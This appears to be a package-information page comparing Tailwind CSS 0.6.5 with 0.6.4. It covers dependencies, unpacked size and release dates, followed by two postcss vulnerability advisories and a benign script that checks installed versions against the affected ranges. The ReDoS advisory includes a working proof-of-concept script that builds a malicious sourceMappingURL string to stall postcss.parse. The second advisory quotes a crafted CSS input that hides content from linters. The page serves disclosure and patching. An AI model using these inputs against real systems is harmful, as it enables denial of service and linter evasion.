Tailwind CSS version 0.6.5 presents a minor update over its predecessor, version 0.6.4, within the rapidly evolving landscape of utility-first CSS frameworks. Both versions maintain identical core dependencies, crucial for the framework's functionality. These shared dependencies include foundational libraries like lodash, postcss, fs-extra, commander, css.escape, postcss-js, perfectionist, postcss-nested, postcss-functions, and postcss-selector-parser, indicating a stable base upon which Tailwind CSS operates. Similarly, the development dependencies, essential for building and testing the framework, remain consistent across both versions, encompassing tools like nsp, jest, eslint, rimraf, prettier, and various Babel presets and plugins.
The primary distinction lies in the dist object, specifically the unpackedSize. Version 0.6.5 exhibits a slightly larger unpacked size of 2039231 bytes compared to version 0.6.4's 2039202 bytes, a difference of merely 29 bytes. This suggests a minor refinement, potentially involving bug fixes, documentation updates, or very small code optimizations. Crucially, both versions maintain the same fileCount of 112, implying no structural changes to the project's file organization. Version 0.6.5 was released on August 14, 2018, following version 0.6.4, released on July 16, 2018. Developers considering upgrading should weigh the benefits of potential minor improvements against the stability of their existing setup. If facing any bugs in version 0.6.4, upgrading should definitely be considered.
All the vulnerabilities related to version 0.6.5 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
    var postcss = require("postcss");

    function build_attack(n) {
      var ret = "a{}";
      for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL=";
      }
      return ret + "!";
    }

    postcss.parse("a{}/*# sourceMappingURL=a.css.map */");
    for (var i = 1; i <= 500000; i++) {
      if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i);
        try {
          postcss.parse(attack_str);
          var time_cost = Date.now() - time;
          console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        } catch (e) {
          var time_cost = Date.now() - time;
          console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        }
      }
    }
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output in CSS nodes (rules, properties) despite originally being inside a comment.
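The practical question for anyone on Tailwind CSS 0.6.x is which installed postcss version is inside the ranges the two advisories above quote. The following is an added example, not code from the page or from the PostCSS or Tailwind projects: it encodes the stated ranges (the upper bound of each range is assumed to be the fixed version and is treated as exclusive) and uses a minimal MAJOR.MINOR.PATCH comparison in place of the semver package.

```javascript
// Added example: map an installed postcss version onto the vulnerable
// ranges stated in the two advisories above. The `semver` package is not
// used so the check runs stand-alone; pre-release/build suffixes are dropped.

// Parse "MAJOR.MINOR.PATCH" (optionally prefixed with "v") into three numbers.
function parseVersion(v) {
  const core = v.trim().replace(/^v/, '').split(/[-+]/)[0];
  const parts = core.split('.').map(Number);
  if (parts.length !== 3 || parts.some(Number.isNaN)) {
    throw new Error(`not a MAJOR.MINOR.PATCH version: ${v}`);
  }
  return parts;
}

// Numeric comparison of two versions: -1, 0 or 1, usable as a sort comparator
// (so "8.2.13" sorts before "8.10.0", unlike a plain string compare).
function compareVersions(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

// Ranges as quoted in the advisories, as [lower inclusive, upper exclusive).
// Assumption: the upper bound named in each advisory is the fixed release,
// so "before 7.0.36" and "between 8.0.0 and 8.2.13" exclude 7.0.36 and 8.2.13.
const POSTCSS_ADVISORIES = [
  { id: 'ReDoS in previous-map.js', ranges: [['0.0.0', '7.0.36'], ['8.0.0', '8.2.13']] },
  { id: 'line return parsing error', ranges: [['0.0.0', '8.4.31']] },
];

// Return the ids of the advisories whose ranges contain the installed version.
function affectedAdvisories(installed) {
  return POSTCSS_ADVISORIES
    .filter(({ ranges }) => ranges.some(([lo, hi]) =>
      compareVersions(installed, lo) >= 0 && compareVersions(installed, hi) < 0))
    .map(({ id }) => id);
}

// Constructed sample versions: 7.0.35 is inside both ranges, 8.4.31 inside neither.
console.log('7.0.35 ->', affectedAdvisories('7.0.35'));
console.log('8.4.31 ->', affectedAdvisories('8.4.31'));
```

Feed it the version reported by `npm ls postcss` for the project; a version inside the 8.x ReDoS range is still inside the line-return range, so only 8.4.31 or later clears both advisories listed here.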